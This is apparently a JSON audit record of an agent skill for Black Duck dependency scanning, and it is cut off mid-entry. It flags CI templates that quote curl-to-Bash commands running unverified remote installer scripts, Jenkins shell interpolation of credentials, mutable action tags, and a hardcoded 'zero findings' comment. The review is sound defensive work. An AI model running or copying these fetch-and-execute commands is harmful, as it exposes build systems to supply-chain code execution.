{"data":{"skill":{"slug":"agentsecops-sca-blackduck","name":"sca-blackduck","icon":"📦","repo":"https://github.com/AgentSecOps/SecOpsAgentKit/tree/main/skills/appsec/sca-blackduck","status":"approved","author":"AgentSecOps","authorVersion":"0.1.0","skillstoreRevision":2},"audit":{"id":"0535f604-c293-43dd-9c1d-f46ec7cc80b7","skill_id":"9a59b742-9f6b-4a51-a5ff-342ab044cf9e","version":9,"content_hash":"v3:181fdefcafd96b041926e61c4b2e306ca7e7820e:423c6c504e7d1c7d813281bb58789e3d49dd1fec85872296c662788dbe6e3eff:d6648b9cea79c8f6fc9ee23a78245125d79136ac68bdd03a3e9e949678dab163:736b696c6c732f6167656e747365636f70732f7363612d626c61636b6475636b:ec2469ba3eaf655f4b0b8834582136d8","risk_level":"critical","is_blocked":true,"safe_to_publish":false,"analysis_status":"ok","agent_auto_install_policy":"blocked","manual_install_policy":"allowed_with_warning","summary":"Most static alerts are false positives caused by Markdown examples, reference URLs, configuration exclusions, and legitimate environment access. Confirmed findings involve unverified remote scripts executed by CI templates and user instructions. Additional review found mutable GitHub Action tags, unsafe Jenkins interpolation, and a pull request comment that reports fixed zero findings.","remediation":[{"issue":"CI templates and instructions execute scripts downloaded from mutable URLs.","severity":"critical","suggestion":"Download a versioned release, verify its checksum or signature, and execute only the verified local artifact."},{"issue":"The GitHub pull request comment reports fixed zero findings.","severity":"high","suggestion":"Parse generated scan results and fail closed when results are absent, malformed, or incomplete."},{"issue":"The Jenkins pipeline interpolates branch data and credentials into shell command strings.","severity":"high","suggestion":"Pass values through environment variables, quote them inside the shell, and use Jenkins credential bindings without Groovy interpolation."},{"issue":"GitHub Actions use mutable major-version tags.","severity":"medium","suggestion":"Pin every action to a reviewed full commit SHA and use an automated process for controlled updates."}],"risk_factor_evidence":[{"factor":"filesystem","evidence":[{"file":"assets/blackduck_config.yml","line_end":29,"line_start":29},{"file":"assets/blackduck_config.yml","line_end":33,"line_start":33},{"file":"assets/ci_integration/jenkins_pipeline.groovy","line_end":34,"line_start":34},{"file":"assets/ci-config-template.yml","line_end":323,"line_start":323},{"file":"assets/ci-config-template.yml","line_end":323,"line_start":323},{"file":"assets/policy_templates/security_policy.json","line_end":154,"line_start":154}]},{"factor":"external_commands","evidence":[{"file":"assets/ci_integration/github_actions.yml","line_end":110,"line_start":110},{"file":"assets/ci_integration/github_actions.yml","line_end":111,"line_start":111},{"file":"assets/ci_integration/github_actions.yml","line_end":92,"line_start":92},{"file":"assets/ci_integration/gitlab_ci.yml","line_end":121,"line_start":121},{"file":"assets/ci_integration/gitlab_ci.yml","line_end":151,"line_start":151},{"file":"assets/ci-config-template.yml","line_end":298,"line_start":298},{"file":"assets/ci-config-template.yml","line_end":301,"line_start":301},{"file":"assets/ci-config-template.yml","line_end":304,"line_start":304},{"file":"assets/ci-config-template.yml","line_end":307,"line_start":307},{"file":"assets/ci-config-template.yml","line_end":310,"line_start":310},{"file":"assets/ci-config-template.yml","line_end":134,"line_start":134},{"file":"assets/ci-config-template.yml","line_end":250,"line_start":250},{"file":"assets/ci-config-template.yml","line_end":291,"line_start":291},{"file":"references/supply_chain_threats.md","line_end":199,"line_start":199},{"file":"references/supply_chain_threats.md","line_end":204,"line_start":204},{"file":"references/supply_chain_threats.md","line_end":205,"line_start":205},{"file":"references/supply_chain_threats.md","line_end":200,"line_start":200},{"file":"references/supply_chain_threats.md","line_end":532,"line_start":532},{"file":"references/supply_chain_threats.md","line_end":205,"line_start":205},{"file":"references/supply_chain_threats.md","line_end":286,"line_start":286},{"file":"references/supply_chain_threats.md","line_end":335,"line_start":335},{"file":"references/supply_chain_threats.md","line_end":513,"line_start":513},{"file":"SKILL.md","line_end":47,"line_start":40},{"file":"SKILL.md","line_end":51,"line_start":47},{"file":"SKILL.md","line_end":57,"line_start":51},{"file":"SKILL.md","line_end":65,"line_start":57},{"file":"SKILL.md","line_end":79,"line_start":65},{"file":"SKILL.md","line_end":97,"line_start":79},{"file":"SKILL.md","line_end":151,"line_start":97},{"file":"SKILL.md","line_end":152,"line_start":151},{"file":"SKILL.md","line_end":153,"line_start":152},{"file":"SKILL.md","line_end":154,"line_start":153},{"file":"SKILL.md","line_end":158,"line_start":154},{"file":"SKILL.md","line_end":159,"line_start":158},{"file":"SKILL.md","line_end":160,"line_start":159},{"file":"SKILL.md","line_end":161,"line_start":160},{"file":"SKILL.md","line_end":165,"line_start":161},{"file":"SKILL.md","line_end":166,"line_start":165},{"file":"SKILL.md","line_end":167,"line_start":166},{"file":"SKILL.md","line_end":168,"line_start":167},{"file":"SKILL.md","line_end":169,"line_start":168},{"file":"SKILL.md","line_end":175,"line_start":169},{"file":"SKILL.md","line_end":183,"line_start":175},{"file":"SKILL.md","line_end":187,"line_start":183},{"file":"SKILL.md","line_end":194,"line_start":187},{"file":"SKILL.md","line_end":198,"line_start":194},{"file":"SKILL.md","line_end":205,"line_start":198},{"file":"SKILL.md","line_end":209,"line_start":205},{"file":"SKILL.md","line_end":216,"line_start":209},{"file":"SKILL.md","line_end":220,"line_start":216}]},{"factor":"network","evidence":[{"file":"assets/ci_integration/github_actions.yml","line_end":70,"line_start":70},{"file":"assets/ci_integration/gitlab_ci.yml","line_end":30,"line_start":30},{"file":"assets/ci_integration/gitlab_ci.yml","line_end":85,"line_start":85},{"file":"assets/ci_integration/gitlab_ci.yml","line_end":181,"line_start":181},{"file":"assets/ci_integration/jenkins_pipeline.groovy","line_end":90,"line_start":90},{"file":"assets/ci_integration/jenkins_pipeline.groovy","line_end":143,"line_start":143},{"file":"assets/ci-config-template.yml","line_end":240,"line_start":240},{"file":"assets/policy_templates/security_policy.json","line_end":2,"line_start":2},{"file":"assets/rule-template.yaml","line_end":43,"line_start":43},{"file":"assets/rule-template.yaml","line_end":44,"line_start":44},{"file":"assets/rule-template.yaml","line_end":45,"line_start":45},{"file":"assets/rule-template.yaml","line_end":73,"line_start":73},{"file":"assets/rule-template.yaml","line_end":118,"line_start":118},{"file":"assets/rule-template.yaml","line_end":119,"line_start":119},{"file":"assets/rule-template.yaml","line_end":151,"line_start":151},{"file":"assets/rule-template.yaml","line_end":191,"line_start":191},{"file":"assets/rule-template.yaml","line_end":192,"line_start":192},{"file":"assets/rule-template.yaml","line_end":193,"line_start":193},{"file":"assets/rule-template.yaml","line_end":217,"line_start":217},{"file":"assets/rule-template.yaml","line_end":260,"line_start":260},{"file":"assets/rule-template.yaml","line_end":261,"line_start":261},{"file":"assets/rule-template.yaml","line_end":288,"line_start":288},{"file":"references/license_risk_guide.md","line_end":361,"line_start":361},{"file":"references/remediation_strategies.md","line_end":209,"line_start":209},{"file":"references/remediation_strategies.md","line_end":301,"line_start":301},{"file":"references/remediation_strategies.md","line_end":302,"line_start":302},{"file":"references/supply_chain_threats.md","line_end":193,"line_start":193},{"file":"references/supply_chain_threats.md","line_end":62,"line_start":62},{"file":"references/supply_chain_threats.md","line_end":65,"line_start":65},{"file":"references/supply_chain_threats.md","line_end":66,"line_start":66},{"file":"references/supply_chain_threats.md","line_end":69,"line_start":69},{"file":"references/supply_chain_threats.md","line_end":75,"line_start":75},{"file":"references/supply_chain_threats.md","line_end":193,"line_start":193},{"file":"references/supply_chain_threats.md","line_end":200,"line_start":200},{"file":"references/supply_chain_threats.md","line_end":388,"line_start":388},{"file":"references/supply_chain_threats.md","line_end":412,"line_start":412},{"file":"references/supply_chain_threats.md","line_end":413,"line_start":413},{"file":"references/supply_chain_threats.md","line_end":518,"line_start":518},{"file":"SKILL.md","line_end":21,"line_start":21},{"file":"SKILL.md","line_end":22,"line_start":22},{"file":"SKILL.md","line_end":23,"line_start":23},{"file":"SKILL.md","line_end":24,"line_start":24},{"file":"SKILL.md","line_end":42,"line_start":42},{"file":"SKILL.md","line_end":53,"line_start":53},{"file":"SKILL.md","line_end":189,"line_start":189},{"file":"SKILL.md","line_end":280,"line_start":280},{"file":"SKILL.md","line_end":293,"line_start":293},{"file":"SKILL.md","line_end":299,"line_start":299},{"file":"SKILL.md","line_end":385,"line_start":385},{"file":"SKILL.md","line_end":386,"line_start":386}]},{"factor":"env_access","evidence":[{"file":"assets/ci_integration/github_actions.yml","line_end":110,"line_start":110},{"file":"assets/ci_integration/github_actions.yml","line_end":111,"line_start":111},{"file":"assets/ci_integration/github_actions.yml","line_end":110,"line_start":110},{"file":"assets/ci_integration/github_actions.yml","line_end":111,"line_start":111},{"file":"assets/ci_integration/github_actions.yml","line_end":41,"line_start":41},{"file":"assets/ci_integration/github_actions.yml","line_end":103,"line_start":103},{"file":"assets/ci-config-template.yml","line_end":164,"line_start":164},{"file":"assets/rule-template.yaml","line_end":148,"line_start":148},{"file":"assets/rule-template.yaml","line_end":148,"line_start":148},{"file":"assets/rule-template.yaml","line_end":147,"line_start":147},{"file":"assets/rule-template.yaml","line_end":162,"line_start":162},{"file":"assets/rule-template.yaml","line_end":132,"line_start":132},{"file":"assets/rule-template.yaml","line_end":147,"line_start":147},{"file":"assets/rule-template.yaml","line_end":148,"line_start":148},{"file":"assets/rule-template.yaml","line_end":156,"line_start":156},{"file":"assets/rule-template.yaml","line_end":157,"line_start":157},{"file":"assets/rule-template.yaml","line_end":162,"line_start":162},{"file":"assets/rule-template.yaml","line_end":163,"line_start":163},{"file":"assets/rule-template.yaml","line_end":164,"line_start":164},{"file":"assets/rule-template.yaml","line_end":165,"line_start":165},{"file":"references/EXAMPLE.md","line_end":423,"line_start":423},{"file":"references/EXAMPLE.md","line_end":423,"line_start":423},{"file":"references/EXAMPLE.md","line_end":424,"line_start":424},{"file":"references/EXAMPLE.md","line_end":425,"line_start":425},{"file":"references/EXAMPLE.md","line_end":427,"line_start":427},{"file":"references/EXAMPLE.md","line_end":430,"line_start":430},{"file":"references/EXAMPLE.md","line_end":432,"line_start":432},{"file":"references/EXAMPLE.md","line_end":437,"line_start":437},{"file":"references/EXAMPLE.md","line_end":444,"line_start":444},{"file":"references/supply_chain_threats.md","line_end":189,"line_start":189},{"file":"references/supply_chain_threats.md","line_end":190,"line_start":190},{"file":"references/supply_chain_threats.md","line_end":191,"line_start":191},{"file":"references/supply_chain_threats.md","line_end":189,"line_start":189},{"file":"references/supply_chain_threats.md","line_end":190,"line_start":190},{"file":"references/supply_chain_threats.md","line_end":191,"line_start":191},{"file":"references/supply_chain_threats.md","line_end":190,"line_start":190},{"file":"references/supply_chain_threats.md","line_end":191,"line_start":191}]},{"factor":"scripts","evidence":[{"file":"references/EXAMPLE.md","line_end":138,"line_start":138},{"file":"references/EXAMPLE.md","line_end":137,"line_start":137},{"file":"references/remediation_strategies.md","line_end":249,"line_start":249},{"file":"references/supply_chain_threats.md","line_end":200,"line_start":200}]}],"critical_findings":[{"title":"Pipe to shell pattern","locations":[{"file":"assets/ci_integration/github_actions.yml","line_end":70,"line_start":70}],"confidence":0.99,"description":"curl -s -L https://detect.synopsys.com/detect.sh | bash -- \\","review_kind":"security","source_category":"blocker","source_severity":"critical","confidence_reasoning":"The CI template pipes a mutable network response directly into Bash without a pinned version or integrity check. A compromised upstream response would execute with runner privileges."},{"title":"Pipe to shell pattern","locations":[{"file":"assets/ci-config-template.yml","line_end":240,"line_start":240}],"confidence":0.99,"description":"curl -s https://raw.githubusercontent.com/aquasecurity/tfsec/master/scripts/install_linux.sh | bash","review_kind":"security","source_category":"blocker","source_severity":"critical","confidence_reasoning":"The CI template pipes a mutable network response directly into Bash without a pinned version or integrity check. A compromised upstream response would execute with runner privileges."}],"high_findings":[{"title":"Hardcoded URL","locations":[{"file":"assets/ci_integration/github_actions.yml","line_end":70,"line_start":70}],"confidence":0.98,"description":"curl -s -L https://detect.synopsys.com/detect.sh | bash -- \\","review_kind":"capability","source_category":"network","source_severity":"low","confidence_reasoning":"This URL supplies a script that is executed immediately without version pinning or integrity verification. A compromised response would execute with CI or user privileges."},{"title":"Hardcoded URL","locations":[{"file":"assets/ci_integration/gitlab_ci.yml","line_end":30,"line_start":30}],"confidence":0.98,"description":"bash <(curl -s -L https://detect.synopsys.com/detect.sh) \\","review_kind":"capability","source_category":"network","source_severity":"low","confidence_reasoning":"This URL supplies a script that is executed immediately without version pinning or integrity verification. A compromised response would execute with CI or user privileges."},{"title":"Hardcoded URL","locations":[{"file":"assets/ci_integration/gitlab_ci.yml","line_end":85,"line_start":85}],"confidence":0.98,"description":"bash <(curl -s -L https://detect.synopsys.com/detect.sh) \\","review_kind":"capability","source_category":"network","source_severity":"low","confidence_reasoning":"This URL supplies a script that is executed immediately without version pinning or integrity verification. A compromised response would execute with CI or user privileges."},{"title":"Hardcoded URL","locations":[{"file":"assets/ci_integration/gitlab_ci.yml","line_end":181,"line_start":181}],"confidence":0.98,"description":"bash <(curl -s -L https://detect.synopsys.com/detect.sh) \\","review_kind":"capability","source_category":"network","source_severity":"low","confidence_reasoning":"This URL supplies a script that is executed immediately without version pinning or integrity verification. A compromised response would execute with CI or user privileges."},{"title":"Hardcoded URL","locations":[{"file":"assets/ci_integration/jenkins_pipeline.groovy","line_end":90,"line_start":90}],"confidence":0.98,"description":"bash <(curl -s -L https://detect.synopsys.com/detect.sh) \\","review_kind":"capability","source_category":"network","source_severity":"low","confidence_reasoning":"This URL supplies a script that is executed immediately without version pinning or integrity verification. A compromised response would execute with CI or user privileges."},{"title":"Hardcoded URL","locations":[{"file":"assets/ci_integration/jenkins_pipeline.groovy","line_end":143,"line_start":143}],"confidence":0.98,"description":"bash <(curl -s -L https://detect.synopsys.com/detect.sh) \\","review_kind":"capability","source_category":"network","source_severity":"low","confidence_reasoning":"This URL supplies a script that is executed immediately without version pinning or integrity verification. A compromised response would execute with CI or user privileges."},{"title":"Hardcoded URL","locations":[{"file":"assets/ci-config-template.yml","line_end":240,"line_start":240}],"confidence":0.98,"description":"curl -s https://raw.githubusercontent.com/aquasecurity/tfsec/master/scripts/install_linux.sh | bash","review_kind":"capability","source_category":"network","source_severity":"low","confidence_reasoning":"This URL supplies a script that is executed immediately without version pinning or integrity verification. A compromised response would execute with CI or user privileges."},{"title":"Hardcoded URL","locations":[{"file":"SKILL.md","line_end":42,"line_start":42}],"confidence":0.98,"description":"bash <(curl -s -L https://detect.synopsys.com/detect.sh) \\","review_kind":"capability","source_category":"network","source_severity":"low","confidence_reasoning":"This URL supplies a script that is executed immediately without version pinning or integrity verification. A compromised response would execute with CI or user privileges."},{"title":"Hardcoded URL","locations":[{"file":"SKILL.md","line_end":53,"line_start":53}],"confidence":0.98,"description":"bash <(curl -s -L https://detect.synopsys.com/detect.sh) \\","review_kind":"capability","source_category":"network","source_severity":"low","confidence_reasoning":"This URL supplies a script that is executed immediately without version pinning or integrity verification. A compromised response would execute with CI or user privileges."},{"title":"Hardcoded URL","locations":[{"file":"SKILL.md","line_end":189,"line_start":189}],"confidence":0.98,"description":"bash <(curl -s -L https://detect.synopsys.com/detect.sh) \\","review_kind":"capability","source_category":"network","source_severity":"low","confidence_reasoning":"This URL supplies a script that is executed immediately without version pinning or integrity verification. A compromised response would execute with CI or user privileges."},{"title":"Hardcoded URL","locations":[{"file":"SKILL.md","line_end":280,"line_start":280}],"confidence":0.98,"description":"bash <(curl -s -L https://detect.synopsys.com/detect.sh) \\","review_kind":"capability","source_category":"network","source_severity":"low","confidence_reasoning":"This URL supplies a script that is executed immediately without version pinning or integrity verification. A compromised response would execute with CI or user privileges."},{"title":"Hardcoded URL","locations":[{"file":"SKILL.md","line_end":293,"line_start":293}],"confidence":0.98,"description":"bash <(curl -s -L https://detect.synopsys.com/detect.sh) \\","review_kind":"capability","source_category":"network","source_severity":"low","confidence_reasoning":"This URL supplies a script that is executed immediately without version pinning or integrity verification. A compromised response would execute with CI or user privileges."},{"title":"Hardcoded URL","locations":[{"file":"SKILL.md","line_end":299,"line_start":299}],"confidence":0.98,"description":"bash <(curl -s -L https://detect.synopsys.com/detect.sh) \\","review_kind":"capability","source_category":"network","source_severity":"low","confidence_reasoning":"This URL supplies a script that is executed immediately without version pinning or integrity verification. A compromised response would execute with CI or user privileges."},{"title":"Misleading fixed security results","locations":[{"file":"assets/ci_integration/github_actions.yml","line_end":125,"line_start":113}],"confidence":0.99,"description":"The GitHub workflow posts zero vulnerability counts and no license violations without parsing results, which can mislead reviewers.","review_kind":"security","source_category":"semantic","source_severity":"high","confidence_reasoning":"The comment body contains fixed zero counts and an unconditional no-violations statement. Nearby comments acknowledge that actual results are not parsed."},{"title":"Jenkins shell injection and secret exposure","locations":[{"file":"assets/ci_integration/jenkins_pipeline.groovy","line_end":34,"line_start":32},{"file":"assets/ci_integration/jenkins_pipeline.groovy","line_end":99,"line_start":89},{"file":"assets/ci_integration/jenkins_pipeline.groovy","line_end":151,"line_start":142}],"confidence":0.92,"description":"Groovy interpolates branch-derived values and Black Duck credentials into shell strings before execution, enabling command injection and exposing secrets in process arguments.","review_kind":"security","source_category":"semantic","source_severity":"high","confidence_reasoning":"The double-quoted Groovy strings interpolate BRANCH_NAME-derived project data and BLACKDUCK_TOKEN into commands later passed to sh. No argument-safe execution boundary is used."}],"medium_findings":[{"title":"Mutable GitHub Action references","locations":[{"file":"assets/ci_integration/github_actions.yml","line_end":31,"line_start":31},{"file":"assets/ci_integration/github_actions.yml","line_end":39,"line_start":39},{"file":"assets/ci_integration/github_actions.yml","line_end":57,"line_start":57},{"file":"assets/ci_integration/github_actions.yml","line_end":81,"line_start":81},{"file":"assets/ci_integration/github_actions.yml","line_end":101,"line_start":101},{"file":"assets/ci_integration/github_actions.yml","line_end":143,"line_start":143},{"file":"assets/ci_integration/github_actions.yml","line_end":148,"line_start":148}],"confidence":0.97,"description":"GitHub Actions use mutable major-version tags, allowing upstream changes to execute with repository and token permissions.","review_kind":"security","source_category":"semantic","source_severity":"medium","confidence_reasoning":"Each uses statement ends in a mutable tag such as v1, v3, v4, or v7 rather than an immutable commit SHA."}],"low_findings":[],"dangerous_patterns":[{"title":"Pipe to shell pattern","locations":[{"file":"assets/ci_integration/github_actions.yml","line_end":70,"line_start":70}],"confidence":0.99,"description":"curl -s -L https://detect.synopsys.com/detect.sh | bash -- \\","review_kind":"security","source_category":"blocker","source_severity":"critical","confidence_reasoning":"The CI template pipes a mutable network response directly into Bash without a pinned version or integrity check. A compromised upstream response would execute with runner privileges."},{"title":"Pipe to shell pattern","locations":[{"file":"assets/ci-config-template.yml","line_end":240,"line_start":240}],"confidence":0.99,"description":"curl -s https://raw.githubusercontent.com/aquasecurity/tfsec/master/scripts/install_linux.sh | bash","review_kind":"security","source_category":"blocker","source_severity":"critical","confidence_reasoning":"The CI template pipes a mutable network response directly into Bash without a pinned version or integrity check. A compromised upstream response would execute with runner privileges."}],"files_scanned":15,"total_lines":4881,"audit_model":"codex","audited_at":"2026-07-23T06:53:53.14+00:00","created_at":"2026-07-24T04:56:58.436774+00:00","static_findings":[{"id":"filesystem:assets/blackduck_config.yml:29:hidden-file-access","file":"assets/blackduck_config.yml","pattern":"Hidden file access","snippet":"node_modules/**/.bin,","category":"filesystem","line_end":29,"severity":"medium","line_start":29},{"id":"filesystem:assets/blackduck_config.yml:33:hidden-file-access","file":"assets/blackduck_config.yml","pattern":"Hidden file access","snippet":"**/.venv,","category":"filesystem","line_end":33,"severity":"medium","line_start":33},{"id":"sensitive:assets/blackduck_config.yml:11:certificate-key-files","file":"assets/blackduck_config.yml","pattern":"Certificate/key files","snippet":"trust.cert: false","category":"sensitive","line_end":11,"severity":"high","line_start":11},{"id":"external_commands:assets/ci_integration/github_actions.yml:110:ruby-shell-backtick-execution","file":"assets/ci_integration/github_actions.yml","pattern":"Ruby/shell backtick execution","snippet":"comment += `**Project**: ${process.env.PROJECT_NAME}\\n`;","category":"external_commands","line_end":110,"severity":"medium","line_start":110},{"id":"external_commands:assets/ci_integration/github_actions.yml:111:ruby-shell-backtick-execution","file":"assets/ci_integration/github_actions.yml","pattern":"Ruby/shell backtick execution","snippet":"comment += `**Version**: ${process.env.PROJECT_VERSION}\\n\\n`;","category":"external_commands","line_end":111,"severity":"medium","line_start":111},{"id":"external_commands:assets/ci_integration/github_actions.yml:92:shell-command-substitution","file":"assets/ci_integration/github_actions.yml","pattern":"Shell command substitution","snippet":"CRITICAL=$(jq -r '.policyStatus.overallStatus' ./blackduck-output/runs/*/status/status.json)","category":"external_commands","line_end":92,"severity":"medium","line_start":92},{"id":"network:assets/ci_integration/github_actions.yml:70:hardcoded-url","file":"assets/ci_integration/github_actions.yml","pattern":"Hardcoded URL","snippet":"curl -s -L https://detect.synopsys.com/detect.sh | bash -- \\","category":"network","line_end":70,"severity":"low","line_start":70},{"id":"env_access:assets/ci_integration/github_actions.yml:110:environment-variable-access-dot-notation","file":"assets/ci_integration/github_actions.yml","pattern":"Environment variable access (dot notation)","snippet":"comment += `**Project**: ${process.env.PROJECT_NAME}\\n`;","category":"env_access","line_end":110,"severity":"low","line_start":110},{"id":"env_access:assets/ci_integration/github_actions.yml:111:environment-variable-access-dot-notation","file":"assets/ci_integration/github_actions.yml","pattern":"Environment variable access (dot notation)","snippet":"comment += `**Version**: ${process.env.PROJECT_VERSION}\\n\\n`;","category":"env_access","line_end":111,"severity":"low","line_start":111},{"id":"env_access:assets/ci_integration/github_actions.yml:110:environment-variable-object","file":"assets/ci_integration/github_actions.yml","pattern":"Environment variable object","snippet":"comment += `**Project**: ${process.env.PROJECT_NAME}\\n`;","category":"env_access","line_end":110,"severity":"low","line_start":110},{"id":"env_access:assets/ci_integration/github_actions.yml:111:environment-variable-object","file":"assets/ci_integration/github_actions.yml","pattern":"Environment variable object","snippet":"comment += `**Version**: ${process.env.PROJECT_VERSION}\\n\\n`;","category":"env_access","line_end":111,"severity":"low","line_start":111},{"id":"env_access:assets/ci_integration/github_actions.yml:41:git-platform-tokens","file":"assets/ci_integration/github_actions.yml","pattern":"Git platform tokens","snippet":"github-token: ${{ secrets.GITHUB_TOKEN }}","category":"env_access","line_end":41,"severity":"high","line_start":41},{"id":"env_access:assets/ci_integration/github_actions.yml:103:git-platform-tokens","file":"assets/ci_integration/github_actions.yml","pattern":"Git platform tokens","snippet":"github-token: ${{ secrets.GITHUB_TOKEN }}","category":"env_access","line_end":103,"severity":"high","line_start":103},{"id":"sensitive:assets/ci_integration/github_actions.yml:110:environment-file-access","file":"assets/ci_integration/github_actions.yml","pattern":"Environment file access","snippet":"comment += `**Project**: ${process.env.PROJECT_NAME}\\n`;","category":"sensitive","line_end":110,"severity":"high","line_start":110},{"id":"sensitive:assets/ci_integration/github_actions.yml:111:environment-file-access","file":"assets/ci_integration/github_actions.yml","pattern":"Environment file access","snippet":"comment += `**Version**: ${process.env.PROJECT_VERSION}\\n\\n`;","category":"sensitive","line_end":111,"severity":"high","line_start":111},{"id":"blocker:assets/ci_integration/github_actions.yml:70:pipe-to-shell-pattern","file":"assets/ci_integration/github_actions.yml","pattern":"Pipe to shell pattern","snippet":"curl -s -L https://detect.synopsys.com/detect.sh | bash -- \\","category":"blocker","line_end":70,"severity":"critical","line_start":70},{"id":"external_commands:assets/ci_integration/gitlab_ci.yml:121:shell-command-substitution","file":"assets/ci_integration/gitlab_ci.yml","pattern":"Shell command substitution","snippet":"echo \"**Scan Date**: $(date -u +%Y-%m-%dT%H:%M:%SZ)\" >> security-summary.md","category":"external_commands","line_end":121,"severity":"medium","line_start":121},{"id":"external_commands:assets/ci_integration/gitlab_ci.yml:151:shell-command-substitution","file":"assets/ci_integration/gitlab_ci.yml","pattern":"Shell command substitution","snippet":"POLICY_STATUS=$(jq -r '.policyStatus.overallStatus' ./blackduck-output/runs/*/status/status.json)","category":"external_commands","line_end":151,"severity":"medium","line_start":151},{"id":"network:assets/ci_integration/gitlab_ci.yml:30:hardcoded-url","file":"assets/ci_integration/gitlab_ci.yml","pattern":"Hardcoded URL","snippet":"bash <(curl -s -L https://detect.synopsys.com/detect.sh) \\","category":"network","line_end":30,"severity":"low","line_start":30},{"id":"network:assets/ci_integration/gitlab_ci.yml:85:hardcoded-url","file":"assets/ci_integration/gitlab_ci.yml","pattern":"Hardcoded URL","snippet":"bash <(curl -s -L https://detect.synopsys.com/detect.sh) \\","category":"network","line_end":85,"severity":"low","line_start":85},{"id":"network:assets/ci_integration/gitlab_ci.yml:181:hardcoded-url","file":"assets/ci_integration/gitlab_ci.yml","pattern":"Hardcoded URL","snippet":"bash <(curl -s -L https://detect.synopsys.com/detect.sh) \\","category":"network","line_end":181,"severity":"low","line_start":181},{"id":"network:assets/ci_integration/jenkins_pipeline.groovy:90:hardcoded-url","file":"assets/ci_integration/jenkins_pipeline.groovy","pattern":"Hardcoded URL","snippet":"bash <(curl -s -L https://detect.synopsys.com/detect.sh) \\","category":"network","line_end":90,"severity":"low","line_start":90},{"id":"network:assets/ci_integration/jenkins_pipeline.groovy:143:hardcoded-url","file":"assets/ci_integration/jenkins_pipeline.groovy","pattern":"Hardcoded URL","snippet":"bash <(curl -s -L https://detect.synopsys.com/detect.sh) \\","category":"network","line_end":143,"severity":"low","line_start":143},{"id":"filesystem:assets/ci_integration/jenkins_pipeline.groovy:34:hidden-file-access","file":"assets/ci_integration/jenkins_pipeline.groovy","pattern":"Hidden file access","snippet":"DETECT_JAR_DOWNLOAD_DIR = \"${WORKSPACE}/.blackduck\"","category":"filesystem","line_end":34,"severity":"medium","line_start":34},{"id":"external_commands:assets/ci-config-template.yml:298:ruby-shell-backtick-execution","file":"assets/ci-config-template.yml","pattern":"Ruby/shell backtick execution","snippet":"See artifacts: `sast-results`","category":"external_commands","line_end":298,"severity":"medium","line_start":298},{"id":"external_commands:assets/ci-config-template.yml:301:ruby-shell-backtick-execution","file":"assets/ci-config-template.yml","pattern":"Ruby/shell backtick execution","snippet":"See artifacts: `dependency-scan-results`","category":"external_commands","line_end":301,"severity":"medium","line_start":301},{"id":"external_commands:assets/ci-config-template.yml:304:ruby-shell-backtick-execution","file":"assets/ci-config-template.yml","pattern":"Ruby/shell backtick execution","snippet":"See artifacts: `secrets-scan-results`","category":"external_commands","line_end":304,"severity":"medium","line_start":304},{"id":"external_commands:assets/ci-config-template.yml:307:ruby-shell-backtick-execution","file":"assets/ci-config-template.yml","pattern":"Ruby/shell backtick execution","snippet":"See artifacts: `container-scan-results`","category":"external_commands","line_end":307,"severity":"medium","line_start":307},{"id":"external_commands:assets/ci-config-template.yml:310:ruby-shell-backtick-execution","file":"assets/ci-config-template.yml","pattern":"Ruby/shell backtick execution","snippet":"See artifacts: `iac-scan-results`","category":"external_commands","line_end":310,"severity":"medium","line_start":310},{"id":"external_commands:assets/ci-config-template.yml:134:shell-command-substitution","file":"assets/ci-config-template.yml","pattern":"Shell command substitution","snippet":"critical_count=$(python3 -c \"import json; data=json.load(open('${{ env.REPORT_DIR }}/safety-results.","category":"external_commands","line_end":134,"severity":"medium","line_start":134},{"id":"external_commands:assets/ci-config-template.yml:250:shell-command-substitution","file":"assets/ci-config-template.yml","pattern":"Shell command substitution","snippet":"critical_count=$(python3 -c \"import json; data=json.load(open('${{ env.REPORT_DIR }}/checkov-results","category":"external_commands","line_end":250,"severity":"medium","line_start":250},{"id":"external_commands:assets/ci-config-template.yml:291:shell-command-substitution","file":"assets/ci-config-template.yml","pattern":"Shell command substitution","snippet":"**Scan Date**: $(date -u +\"%Y-%m-%d %H:%M:%S UTC\")","category":"external_commands","line_end":291,"severity":"medium","line_start":291},{"id":"network:assets/ci-config-template.yml:240:hardcoded-url","file":"assets/ci-config-template.yml","pattern":"Hardcoded URL","snippet":"curl -s https://raw.githubusercontent.com/aquasecurity/tfsec/master/scripts/install_linux.sh | bash","category":"network","line_end":240,"severity":"low","line_start":240},{"id":"filesystem:assets/ci-config-template.yml:323:node-js-fs-operations","file":"assets/ci-config-template.yml","pattern":"Node.js fs operations","snippet":"const report = fs.readFileSync('consolidated-report/security-summary.md', 'utf8');","category":"filesystem","line_end":323,"severity":"medium","line_start":323},{"id":"filesystem:assets/ci-config-template.yml:323:synchronous-file-operations","file":"assets/ci-config-template.yml","pattern":"Synchronous file operations","snippet":"const report = fs.readFileSync('consolidated-report/security-summary.md', 'utf8');","category":"filesystem","line_end":323,"severity":"medium","line_start":323},{"id":"env_access:assets/ci-config-template.yml:164:git-platform-tokens","file":"assets/ci-config-template.yml","pattern":"Git platform tokens","snippet":"GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}","category":"env_access","line_end":164,"severity":"high","line_start":164},{"id":"blocker:assets/ci-config-template.yml:240:pipe-to-shell-pattern","file":"assets/ci-config-template.yml","pattern":"Pipe to shell pattern","snippet":"curl -s https://raw.githubusercontent.com/aquasecurity/tfsec/master/scripts/install_linux.sh | bash","category":"blocker","line_end":240,"severity":"critical","line_start":240},{"id":"network:assets/policy_templates/security_policy.json:2:hardcoded-url","file":"assets/policy_templates/security_policy.json","pattern":"Hardcoded URL","snippet":"\"$schema\": \"https://json-schema.org/draft-07/schema#\",","category":"network","line_end":2,"severity":"low","line_start":2},{"id":"filesystem:assets/policy_templates/security_policy.json:154:hidden-file-access","file":"assets/policy_templates/security_policy.json","pattern":"Hidden file access","snippet":"\"node_modules/**/.bin/**\"","category":"filesystem","line_end":154,"severity":"medium","line_start":154},{"id":"network:assets/rule-template.yaml:43:hardcoded-url","file":"assets/rule-template.yaml","pattern":"Hardcoded URL","snippet":"- \"https://owasp.org/www-community/attacks/SQL_Injection\"","category":"network","line_end":43,"severity":"low","line_start":43},{"id":"network:assets/rule-template.yaml:44:hardcoded-url","file":"assets/rule-template.yaml","pattern":"Hardcoded URL","snippet":"- \"https://cwe.mitre.org/data/definitions/89.html\"","category":"network","line_end":44,"severity":"low","line_start":44},{"id":"network:assets/rule-template.yaml:45:hardcoded-url","file":"assets/rule-template.yaml","pattern":"Hardcoded URL","snippet":"- 